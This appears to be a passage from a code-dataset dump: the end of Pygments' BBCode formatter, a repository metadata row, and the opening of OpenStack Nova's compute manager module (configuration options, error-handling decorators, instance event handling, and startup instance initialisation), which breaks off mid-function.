Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`codetag`
If set to true, put the output into ``[code]`` tags (default:
``false``)
`monofont`
If set to true, add a tag to show the code with a monospace font
(default: ``false``).
"""
name = 'BBCode'
aliases = ['bbcode', 'bb']
filenames = []
def __init__(self, **options):
Formatter.__init__(self, **options)
self._code = get_bool_opt(options, 'codetag', False)
self._mono = get_bool_opt(options, 'monofont', False)
self.styles = {}
self._make_styles()
def _make_styles(self):
for ttype, ndef in self.style:
start = end = ''
if ndef['color']:
start += '[color=#%s]' % ndef['color']
end = '[/color]' + end
if ndef['bold']:
start += '[b]'
end = '[/b]' + end
if ndef['italic']:
start += '[i]'
end = '[/i]' + end
if ndef['underline']:
start += '[u]'
end = '[/u]' + end
# there are no common BBcodes for background-color and border
self.styles[ttype] = start, end
def format_unencoded(self, tokensource, outfile):
if self._code:
outfile.write('[code]')
if self._mono:
outfile.write('[font=monospace]')
lastval = ''
lasttype = None
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
if ttype == lasttype:
lastval += value
else:
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
lastval = value
lasttype = ttype
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
if self._mono:
outfile.write('[/font]')
if self._code:
outfile.write('[/code]')
if self._code or self._mono:
outfile.write('\n')
| bsd-3-clause |
alexandrucoman/vbox-nova-driver | nova/compute/manager.py | 1 | 323194 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all processes relating to instances (guest vms).
The :py:class:`ComputeManager` class is a :py:class:`nova.manager.Manager` that
handles RPC calls relating to creating instances. It is responsible for
building a disk image, launching it via the underlying virtualization driver,
responding to calls to check its state, attaching persistent storage, and
terminating it.
"""
import base64
import contextlib
import functools
import socket
import sys
import time
import traceback
import uuid
from cinderclient import exceptions as cinder_exception
import eventlet.event
from eventlet import greenthread
import eventlet.semaphore
import eventlet.timeout
from keystoneclient import exceptions as keystone_exception
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import timeutils
import six
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova.cloudpipe import pipelib
from nova import compute
from nova.compute import build_results
from nova.compute import power_state
from nova.compute import resource_tracker
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova import consoleauth
import nova.context
from nova import exception
from nova import hooks
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova.image import glance
from nova import manager
from nova import network
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import loopingcall
from nova.openstack.common import periodic_task
from nova import paths
from nova import rpc
from nova import safe_utils
from nova.scheduler import client as scheduler_client
from nova.scheduler import rpcapi as scheduler_rpcapi
from nova import utils
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import storage_users
from nova.virt import virtapi
from nova import volume
from nova.volume import encryptors
compute_opts = [
cfg.StrOpt('console_host',
default=socket.gethostname(),
help='Console proxy host to use to connect '
'to instances on this host.'),
cfg.StrOpt('default_access_ip_network_name',
help='Name of network to use to set access IPs for instances'),
cfg.BoolOpt('defer_iptables_apply',
default=False,
help='Whether to batch up the application of IPTables rules'
' during a host restart and apply all at the end of the'
' init phase'),
cfg.StrOpt('instances_path',
default=paths.state_path_def('instances'),
help='Where instances are stored on disk'),
cfg.BoolOpt('instance_usage_audit',
default=False,
help="Generate periodic compute.instance.exists"
" notifications"),
cfg.IntOpt('live_migration_retry_count',
default=30,
help="Number of 1 second retries needed in live_migration"),
cfg.BoolOpt('resume_guests_state_on_host_boot',
default=False,
help='Whether to start guests that were running before the '
'host rebooted'),
cfg.IntOpt('network_allocate_retries',
default=0,
help="Number of times to retry network allocation on failures"),
cfg.IntOpt('max_concurrent_builds',
default=10,
help='Maximum number of instance builds to run concurrently'),
cfg.IntOpt('block_device_allocate_retries',
default=60,
help='Number of times to retry block device'
' allocation on failures')
]
interval_opts = [
cfg.IntOpt('bandwidth_poll_interval',
default=600,
help='Interval to pull network bandwidth usage info. Not '
'supported on all hypervisors. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('sync_power_state_interval',
default=600,
help='Interval to sync power states between the database and '
'the hypervisor. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt("heal_instance_info_cache_interval",
default=60,
help="Number of seconds between instance network information "
"cache updates"),
cfg.IntOpt('reclaim_instance_interval',
default=0,
help='Interval in seconds for reclaiming deleted instances'),
cfg.IntOpt('volume_usage_poll_interval',
default=0,
help='Interval in seconds for gathering volume usages'),
cfg.IntOpt('shelved_poll_interval',
default=3600,
help='Interval in seconds for polling shelved instances to '
'offload. Set to -1 to disable.'
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('shelved_offload_time',
default=0,
help='Time in seconds before a shelved instance is eligible '
'for removing from a host. -1 never offload, 0 offload '
'immediately when shelved'),
cfg.IntOpt('instance_delete_interval',
default=300,
help='Interval in seconds for retrying failed instance file '
'deletes. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('block_device_allocate_retries_interval',
default=3,
help='Waiting time interval (seconds) between block'
' device allocation retries on failures'),
cfg.IntOpt('scheduler_instance_sync_interval',
default=120,
help='Waiting time interval (seconds) between sending the '
'scheduler a list of current instance UUIDs to verify '
'that its view of instances is in sync with nova. If the '
'CONF option `scheduler_tracks_instance_changes` is '
'False, changing this option will have no effect.'),
]
timeout_opts = [
cfg.IntOpt("reboot_timeout",
default=0,
help="Automatically hard reboot an instance if it has been "
"stuck in a rebooting state longer than N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("instance_build_timeout",
default=0,
help="Amount of time in seconds an instance can be in BUILD "
"before going into ERROR status. "
"Set to 0 to disable."),
cfg.IntOpt("rescue_timeout",
default=0,
help="Automatically unrescue an instance after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("resize_confirm_window",
default=0,
help="Automatically confirm resizes after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("shutdown_timeout",
default=60,
help="Total amount of time to wait in seconds for an instance "
"to perform a clean shutdown."),
]
running_deleted_opts = [
cfg.StrOpt("running_deleted_instance_action",
default="reap",
help="Action to take if a running deleted instance is detected."
" Valid options are 'noop', 'log', 'shutdown', or 'reap'. "
"Set to 'noop' to take no action."),
cfg.IntOpt("running_deleted_instance_poll_interval",
default=1800,
help="Number of seconds to wait between runs of the cleanup "
"task."),
cfg.IntOpt("running_deleted_instance_timeout",
default=0,
help="Number of seconds after being deleted when a running "
"instance should be considered eligible for cleanup."),
]
instance_cleaning_opts = [
cfg.IntOpt('maximum_instance_delete_attempts',
default=5,
help='The number of times to attempt to reap an instance\'s '
'files.'),
]
CONF = cfg.CONF
CONF.register_opts(compute_opts)
CONF.register_opts(interval_opts)
CONF.register_opts(timeout_opts)
CONF.register_opts(running_deleted_opts)
CONF.register_opts(instance_cleaning_opts)
CONF.import_opt('allow_resize_to_same_host', 'nova.compute.api')
CONF.import_opt('console_topic', 'nova.console.rpcapi')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('vnc_enabled', 'nova.vnc')
CONF.import_opt('enabled', 'nova.spice', group='spice')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('image_cache_manager_interval', 'nova.virt.imagecache')
CONF.import_opt('enabled', 'nova.rdp', group='rdp')
CONF.import_opt('html5_proxy_base_url', 'nova.rdp', group='rdp')
CONF.import_opt('enabled', 'nova.console.serial', group='serial_console')
CONF.import_opt('base_url', 'nova.console.serial', group='serial_console')
CONF.import_opt('destroy_after_evacuate', 'nova.utils', group='workarounds')
CONF.import_opt('scheduler_tracks_instance_changes',
'nova.scheduler.host_manager')
CONF.import_opt('vrde_password_length',
'nova.virt.virtualbox.consoleops', group='virtualbox')
CONF.import_opt('vrde_require_instance_uuid_as_password',
'nova.virt.virtualbox.consoleops', group='virtualbox')
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
@utils.expects_func_args('migration')
def errors_out_migration(function):
"""Decorator to error out migration on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except Exception as ex:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
migration = keyed_args['migration']
# NOTE(rajesht): If InstanceNotFound error is thrown from
# decorated function, migration status should be set to
# 'error', without checking current migration status.
if not isinstance(ex, exception.InstanceNotFound):
status = migration.status
if status not in ['migrating', 'post-migrating']:
return
migration.status = 'error'
try:
with migration.obj_as_admin():
migration.save()
except Exception:
LOG.debug('Error setting migration status '
'for instance %s.',
migration.instance_uuid, exc_info=True)
return decorated_function
@utils.expects_func_args('instance')
def reverts_task_state(function):
"""Decorator to revert task_state on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.UnexpectedTaskStateError as e:
# Note(maoy): unexpected task state means the current
# task is preempted. Do not clear task state in this
# case.
with excutils.save_and_reraise_exception():
LOG.info(_LI("Task possibly preempted: %s"),
e.format_message())
except Exception:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
# NOTE(mriedem): 'instance' must be in keyed_args because we
# have utils.expects_func_args('instance') decorating this
# method.
instance_uuid = keyed_args['instance']['uuid']
try:
self._instance_update(context,
instance_uuid,
task_state=None)
except exception.InstanceNotFound:
# We might delete an instance that failed to build shortly
# after it errored out this is an expected case and we
# should not trace on it.
pass
except Exception as e:
msg = _LW("Failed to revert task state for instance. "
"Error: %s")
LOG.warning(msg, e, instance_uuid=instance_uuid)
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_fault(function):
"""Wraps a method to catch exceptions related to instances.
This decorator wraps a method to catch any exceptions having to do with
an instance that may get thrown. It then logs an instance fault in the db.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.InstanceNotFound:
raise
except Exception as e:
# NOTE(gtt): If argument 'instance' is in args rather than kwargs,
# we will get a KeyError exception which will cover up the real
# exception. So, we update kwargs with the values from args first.
# then, we can get 'instance' from kwargs easily.
kwargs.update(dict(zip(function.func_code.co_varnames[2:], args)))
with excutils.save_and_reraise_exception():
compute_utils.add_instance_fault_from_exc(context,
kwargs['instance'], e, sys.exc_info())
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_event(function):
"""Wraps a method to log the event taken on the instance, and result.
This decorator wraps a method to log the start and result of an event, as
part of an action taken on an instance.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context, *args,
**kwargs)
instance_uuid = keyed_args['instance']['uuid']
event_name = 'compute_{0}'.format(function.func_name)
with compute_utils.EventReporter(context, event_name, instance_uuid):
return function(self, context, *args, **kwargs)
return decorated_function
@utils.expects_func_args('image_id', 'instance')
def delete_image_on_error(function):
"""Used for snapshot related method to ensure the image created in
compute.api is deleted when an error occurs.
"""
@functools.wraps(function)
def decorated_function(self, context, image_id, instance,
*args, **kwargs):
try:
return function(self, context, image_id, instance,
*args, **kwargs)
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug("Cleaning up image %s", image_id,
exc_info=True, instance=instance)
try:
self.image_api.delete(context, image_id)
except Exception:
LOG.exception(_LE("Error while trying to clean up "
"image %s"), image_id,
instance=instance)
return decorated_function
# TODO(danms): Remove me after Icehouse
# NOTE(mikal): if the method being decorated has more than one decorator, then
# put this one first. Otherwise the various exception handling decorators do
# not function correctly.
def object_compat(function):
"""Wraps a method that expects a new-world instance
This provides compatibility for callers passing old-style dict
instances.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
def _load_instance(instance_or_dict):
if isinstance(instance_or_dict, dict):
# try to get metadata and system_metadata for most cases but
# only attempt to load those if the db instance already has
# those fields joined
metas = [meta for meta in ('metadata', 'system_metadata')
if meta in instance_or_dict]
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance_or_dict,
expected_attrs=metas)
instance._context = context
return instance
return instance_or_dict
try:
kwargs['instance'] = _load_instance(kwargs['instance'])
except KeyError:
args = (_load_instance(args[0]),) + args[1:]
migration = kwargs.get('migration')
if isinstance(migration, dict):
migration = objects.Migration._from_db_object(
context.elevated(), objects.Migration(),
migration)
kwargs['migration'] = migration
return function(self, context, *args, **kwargs)
return decorated_function
# TODO(danms): Remove me after Icehouse
def aggregate_object_compat(function):
"""Wraps a method that expects a new-world aggregate."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
aggregate = kwargs.get('aggregate')
if isinstance(aggregate, dict):
aggregate = objects.Aggregate._from_db_object(
context.elevated(), objects.Aggregate(),
aggregate)
kwargs['aggregate'] = aggregate
return function(self, context, *args, **kwargs)
return decorated_function
class InstanceEvents(object):
def __init__(self):
self._events = {}
@staticmethod
def _lock_name(instance):
return '%s-%s' % (instance.uuid, 'events')
def prepare_for_instance_event(self, instance, event_name):
"""Prepare to receive an event for an instance.
This will register an event for the given instance that we will
wait on later. This should be called before initiating whatever
action will trigger the event. The resulting eventlet.event.Event
object should be wait()'d on to ensure completion.
:param instance: the instance for which the event will be generated
:param event_name: the name of the event we're expecting
:returns: an event object that should be wait()'d on
"""
if self._events is None:
# NOTE(danms): We really should have a more specific error
# here, but this is what we use for our default error case
raise exception.NovaException('In shutdown, no new events '
'can be scheduled')
@utils.synchronized(self._lock_name(instance))
def _create_or_get_event():
if instance.uuid not in self._events:
self._events.setdefault(instance.uuid, {})
return self._events[instance.uuid].setdefault(
event_name, eventlet.event.Event())
LOG.debug('Preparing to wait for external event %(event)s',
{'event': event_name}, instance=instance)
return _create_or_get_event()
def pop_instance_event(self, instance, event):
"""Remove a pending event from the wait list.
This will remove a pending event from the wait list so that it
can be used to signal the waiters to wake up.
:param instance: the instance for which the event was generated
:param event: the nova.objects.external_event.InstanceExternalEvent
that describes the event
:returns: the eventlet.event.Event object on which the waiters
are blocked
"""
no_events_sentinel = object()
no_matching_event_sentinel = object()
@utils.synchronized(self._lock_name(instance))
def _pop_event():
if not self._events:
LOG.debug('Unexpected attempt to pop events during shutdown',
instance=instance)
return no_events_sentinel
events = self._events.get(instance.uuid)
if not events:
return no_events_sentinel
_event = events.pop(event.key, None)
if not events:
del self._events[instance.uuid]
if _event is None:
return no_matching_event_sentinel
return _event
result = _pop_event()
if result is no_events_sentinel:
LOG.debug('No waiting events found dispatching %(event)s',
{'event': event.key},
instance=instance)
return None
elif result is no_matching_event_sentinel:
LOG.debug('No event matching %(event)s in %(events)s',
{'event': event.key,
'events': self._events.get(instance.uuid, {}).keys()},
instance=instance)
return None
else:
return result
def clear_events_for_instance(self, instance):
"""Remove all pending events for an instance.
This will remove all events currently pending for an instance
and return them (indexed by event name).
:param instance: the instance for which events should be purged
:returns: a dictionary of {event_name: eventlet.event.Event}
"""
@utils.synchronized(self._lock_name(instance))
def _clear_events():
if self._events is None:
LOG.debug('Unexpected attempt to clear events during shutdown',
instance=instance)
return dict()
return self._events.pop(instance.uuid, {})
return _clear_events()
def cancel_all_events(self):
our_events = self._events
# NOTE(danms): Block new events
self._events = None
for instance_uuid, events in our_events.items():
for event_name, eventlet_event in events.items():
LOG.debug('Canceling in-flight event %(event)s for '
'instance %(instance_uuid)s',
{'event': event_name,
'instance_uuid': instance_uuid})
name, tag = event_name.split('-', 1)
event = objects.InstanceExternalEvent(
instance_uuid=instance_uuid,
name=name, status='failed',
tag=tag, data={})
eventlet_event.send(event)
class ComputeVirtAPI(virtapi.VirtAPI):
def __init__(self, compute):
super(ComputeVirtAPI, self).__init__()
self._compute = compute
def provider_fw_rule_get_all(self, context):
return self._compute.conductor_api.provider_fw_rule_get_all(context)
def _default_error_callback(self, event_name, instance):
raise exception.NovaException(_('Instance event failed'))
@contextlib.contextmanager
def wait_for_instance_event(self, instance, event_names, deadline=300,
error_callback=None):
"""Plan to wait for some events, run some code, then wait.
This context manager will first create plans to wait for the
provided event_names, yield, and then wait for all the scheduled
events to complete.
Note that this uses an eventlet.timeout.Timeout to bound the
operation, so callers should be prepared to catch that
failure and handle that situation appropriately.
If the event is not received by the specified timeout deadline,
eventlet.timeout.Timeout is raised.
If the event is received but did not have a 'completed'
status, a NovaException is raised. If an error_callback is
provided, instead of raising an exception as detailed above
for the failure case, the callback will be called with the
event_name and instance, and can return True to continue
waiting for the rest of the events, False to stop processing,
or raise an exception which will bubble up to the waiter.
:param instance: The instance for which an event is expected
:param event_names: A list of event names. Each element can be a
string event name or tuple of strings to
indicate (name, tag).
:param deadline: Maximum number of seconds we should wait for all
of the specified events to arrive.
:param error_callback: A function to be called if an event arrives
"""
if error_callback is None:
error_callback = self._default_error_callback
events = {}
for event_name in event_names:
if isinstance(event_name, tuple):
name, tag = event_name
event_name = objects.InstanceExternalEvent.make_key(
name, tag)
try:
events[event_name] = (
self._compute.instance_events.prepare_for_instance_event(
instance, event_name))
except exception.NovaException:
error_callback(event_name, instance)
# NOTE(danms): Don't wait for any of the events. They
# should all be canceled and fired immediately below,
# but don't stick around if not.
deadline = 0
yield
with eventlet.timeout.Timeout(deadline):
for event_name, event in events.items():
actual_event = event.wait()
if actual_event.status == 'completed':
continue
decision = error_callback(event_name, instance)
if decision is False:
break
class ComputeManager(manager.Manager):
"""Manages the running instances from creation to destruction."""
target = messaging.Target(version='3.40')
# How long to wait in seconds before re-issuing a shutdown
# signal to a instance during power off. The overall
# time to wait is set by CONF.shutdown_timeout.
SHUTDOWN_RETRY_INTERVAL = 10
def __init__(self, compute_driver=None, *args, **kwargs):
"""Load configuration options and connect to the hypervisor."""
self.virtapi = ComputeVirtAPI(self)
self.network_api = network.API()
self.volume_api = volume.API()
self.image_api = image.API()
self._last_host_check = 0
self._last_bw_usage_poll = 0
self._bw_usage_supported = True
self._last_bw_usage_cell_update = 0
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.conductor_api = conductor.API()
self.compute_task_api = conductor.ComputeTaskAPI()
self.is_neutron_security_groups = (
openstack_driver.is_neutron_security_groups())
self.consoleauth_rpcapi = consoleauth.rpcapi.ConsoleAuthAPI()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.scheduler_rpcapi = scheduler_rpcapi.SchedulerAPI()
self.scheduler_client = scheduler_client.SchedulerClient()
self._resource_tracker_dict = {}
self.instance_events = InstanceEvents()
self._sync_power_pool = eventlet.GreenPool()
self._syncs_in_progress = {}
self.send_instance_updates = CONF.scheduler_tracks_instance_changes
if CONF.max_concurrent_builds != 0:
self._build_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds)
else:
self._build_semaphore = compute_utils.UnlimitedSemaphore()
super(ComputeManager, self).__init__(service_name="compute",
*args, **kwargs)
self.additional_endpoints.append(_ComputeV4Proxy(self))
# NOTE(russellb) Load the driver last. It may call back into the
# compute manager via the virtapi, so we want it to be fully
# initialized before that happens.
self.driver = driver.load_compute_driver(self.virtapi, compute_driver)
self.use_legacy_block_device_info = \
self.driver.need_legacy_block_device_info
def _get_resource_tracker(self, nodename):
rt = self._resource_tracker_dict.get(nodename)
if not rt:
if not self.driver.node_is_available(nodename):
raise exception.NovaException(
_("%s is not a valid node managed by this "
"compute host.") % nodename)
rt = resource_tracker.ResourceTracker(self.host,
self.driver,
nodename)
self._resource_tracker_dict[nodename] = rt
return rt
def _update_resource_tracker(self, context, instance):
"""Let the resource tracker know that an instance has changed state."""
if (instance['host'] == self.host and
self.driver.node_is_available(instance['node'])):
rt = self._get_resource_tracker(instance.get('node'))
rt.update_usage(context, instance)
def _instance_update(self, context, instance_uuid, **kwargs):
"""Update an instance in the database using kwargs as value."""
instance_ref = self.conductor_api.instance_update(context,
instance_uuid,
**kwargs)
self._update_resource_tracker(context, instance_ref)
return instance_ref
def _set_instance_error_state(self, context, instance):
instance_uuid = instance.uuid
try:
self._instance_update(context, instance_uuid,
vm_state=vm_states.ERROR)
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR',
instance_uuid=instance_uuid)
def _set_instance_obj_error_state(self, context, instance):
try:
instance.vm_state = vm_states.ERROR
instance.save()
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR', instance=instance)
def _get_instances_on_driver(self, context, filters=None):
"""Return a list of instance records for the instances found
on the hypervisor which satisfy the specified filters. If filters=None
return a list of instance records for all the instances found on the
hypervisor.
"""
if not filters:
filters = {}
try:
driver_uuids = self.driver.list_instance_uuids()
if len(driver_uuids) == 0:
# Short circuit, don't waste a DB call
return objects.InstanceList()
filters['uuid'] = driver_uuids
local_instances = objects.InstanceList.get_by_filters(
context, filters, use_slave=True)
return local_instances
except NotImplementedError:
pass
# The driver doesn't support uuids listing, so we'll have
# to brute force.
driver_instances = self.driver.list_instances()
instances = objects.InstanceList.get_by_filters(context, filters,
use_slave=True)
name_map = {instance.name: instance for instance in instances}
local_instances = []
for driver_instance in driver_instances:
instance = name_map.get(driver_instance)
if not instance:
continue
local_instances.append(instance)
return local_instances
def _destroy_evacuated_instances(self, context):
"""Destroys evacuated instances.
While nova-compute was down, the instances running on it could be
evacuated to another host. Check that the instances reported
by the driver are still associated with this host. If they are
not, destroy them, with the exception of instances which are in
the MIGRATING, RESIZE_MIGRATING, RESIZE_MIGRATED, RESIZE_FINISH
task state or RESIZED vm state.
"""
our_host = self.host
filters = {'deleted': False}
local_instances = self._get_instances_on_driver(context, filters)
for instance in local_instances:
if instance.host != our_host:
if (instance.task_state in [task_states.MIGRATING,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH]
or instance.vm_state in [vm_states.RESIZED]):
LOG.debug('Will not delete instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s) but its task state is '
'(%(task_state)s) and vm state is '
'(%(vm_state)s)',
{'instance_host': instance.host,
'our_host': our_host,
'task_state': instance.task_state,
'vm_state': instance.vm_state},
instance=instance)
continue
if not CONF.workarounds.destroy_after_evacuate:
LOG.warning(_LW('Instance %(uuid)s appears to have been '
'evacuated from this host to %(host)s. '
'Not destroying it locally due to '
'config setting '
'"workarounds.destroy_after_evacuate". '
'If this is not correct, enable that '
'option and restart nova-compute.'),
{'uuid': instance.uuid,
'host': instance.host})
continue
LOG.info(_LI('Deleting instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s).'),
{'instance_host': instance.host,
'our_host': our_host}, instance=instance)
try:
network_info = self._get_instance_nw_info(context,
instance)
bdi = self._get_instance_block_device_info(context,
instance)
destroy_disks = not (self._is_instance_storage_shared(
context, instance))
except exception.InstanceNotFound:
network_info = network_model.NetworkInfo()
bdi = {}
LOG.info(_LI('Instance has been marked deleted already, '
'removing it from the hypervisor.'),
instance=instance)
# always destroy disks if the instance was deleted
destroy_disks = True
self.driver.destroy(context, instance,
network_info,
bdi, destroy_disks)
def _is_instance_storage_shared(self, context, instance, host=None):
shared_storage = True
data = None
try:
data = self.driver.check_instance_shared_storage_local(context,
instance)
if data:
shared_storage = (self.compute_rpcapi.
check_instance_shared_storage(context,
instance, data, host=host))
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'instance shared storage check, '
'assuming it\'s not on shared storage'),
instance=instance)
shared_storage = False
except Exception:
LOG.exception(_LE('Failed to check if instance shared'),
instance=instance)
finally:
if data:
self.driver.check_instance_shared_storage_cleanup(context,
data)
return shared_storage
def _complete_partial_deletion(self, context, instance):
"""Complete deletion for instances in DELETED status but not marked as
deleted in the DB
"""
system_meta = instance.system_metadata
instance.destroy()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas(context=context)
project_id, user_id = objects.quotas.ids_from_instance(context,
instance)
quotas.reserve(project_id=project_id, user_id=user_id, instances=-1,
cores=-instance.vcpus, ram=-instance.memory_mb)
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
def _complete_deletion(self, context, instance, bdms,
quotas, system_meta):
if quotas:
quotas.commit()
# ensure block device mappings are not leaked
for bdm in bdms:
bdm.destroy()
self._notify_about_instance_usage(context, instance, "delete.end",
system_metadata=system_meta)
if CONF.vnc_enabled or CONF.spice.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(context,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(context,
instance.uuid)
self._delete_scheduler_instance_info(context, instance.uuid)
def _create_reservations(self, context, instance, project_id, user_id):
vcpus = instance.vcpus
mem_mb = instance.memory_mb
quotas = objects.Quotas(context=context)
quotas.reserve(project_id=project_id,
user_id=user_id,
instances=-1,
cores=-vcpus,
ram=-mem_mb)
return quotas
def _init_instance(self, context, instance):
'''Initialize this instance during service init.'''
# NOTE(danms): If the instance appears to not be owned by this
# host, it may have been evacuated away, but skipped by the
# evacuation cleanup code due to configuration. Thus, if that
# is a possibility, don't touch the instance in any way, but
# log the concern. This will help avoid potential issues on
# startup due to misconfiguration.
if instance.host != self.host:
LOG.warning(_LW('Instance %(uuid)s appears to not be owned '
'by this host, but by %(host)s. Startup '
'processing is being skipped.'),
{'uuid': instance.uuid,
'host': instance.host})
return
# Instances that are shut down, or in an error state can not be
# initialized and are not attempted to be recovered. The exception
# to this are instances that are in RESIZE_MIGRATING or DELETING,
# which are dealt with further down.
if (instance.vm_state == vm_states.SOFT_DELETED or
(instance.vm_state == vm_states.ERROR and
instance.task_state not in
(task_states.RESIZE_MIGRATING, task_states.DELETING))):
LOG.debug("Instance is in %s state.",
instance.vm_state, instance=instance)
return
if instance.vm_state == vm_states.DELETED:
try:
self._complete_partial_deletion(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
return
if (instance.vm_state == vm_states.BUILDING or
instance.task_state in [task_states.SCHEDULING,
task_states.BLOCK_DEVICE_MAPPING,
task_states.NETWORKING,
task_states.SPAWNING]):
# NOTE(dave-mcnally) compute stopped before instance was fully
# spawned so set to ERROR state. This is safe to do as the state
# may be set by the api but the host is not so if we get here the
# instance has already been scheduled to this particular host.
LOG.debug("Instance failed to spawn correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state in [vm_states.ACTIVE, vm_states.STOPPED] and
instance.task_state in [task_states.REBUILDING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILD_SPAWNING]):
# NOTE(jichenjc) compute stopped before instance was fully
# spawned so set to ERROR state. This is consistent to BUILD
LOG.debug("Instance failed to rebuild correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.IMAGE_SNAPSHOT_PENDING,
task_states.IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING,
task_states.IMAGE_SNAPSHOT]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance.task_state, instance=instance)
try:
self._post_interrupted_snapshot_cleanup(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to cleanup snapshot.')
LOG.exception(msg, instance=instance)
instance.task_state = None
instance.save()
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.RESIZE_PREP]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance['task_state'], instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.DELETING:
try:
LOG.info(_LI('Service started deleting the instance during '
'the previous run, but did not finish. Restarting'
' the deletion now.'), instance=instance)
instance.obj_load_attr('metadata')
instance.obj_load_attr('system_metadata')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
project_id, user_id = objects.quotas.ids_from_instance(
context, instance)
quotas = self._create_reservations(context, instance,
project_id, user_id)
self._delete_instance(context, instance, bdms, quotas)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
self._set_instance_error_state(context, instance)
return
try_reboot, reboot_type = self._retry_reboot(context, instance)
current_power_state = self._get_power_state(context, instance)
if try_reboot:
LOG.debug("Instance in transitional state (%(task_state)s) at "
"start-up and power state is (%(power_state)s), "
"triggering reboot",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
self.compute_rpcapi.reboot_instance(context, instance,
block_device_info=None,
reboot_type=reboot_type)
return
elif (current_power_state == power_state.RUNNING and
instance.task_state in [task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD,
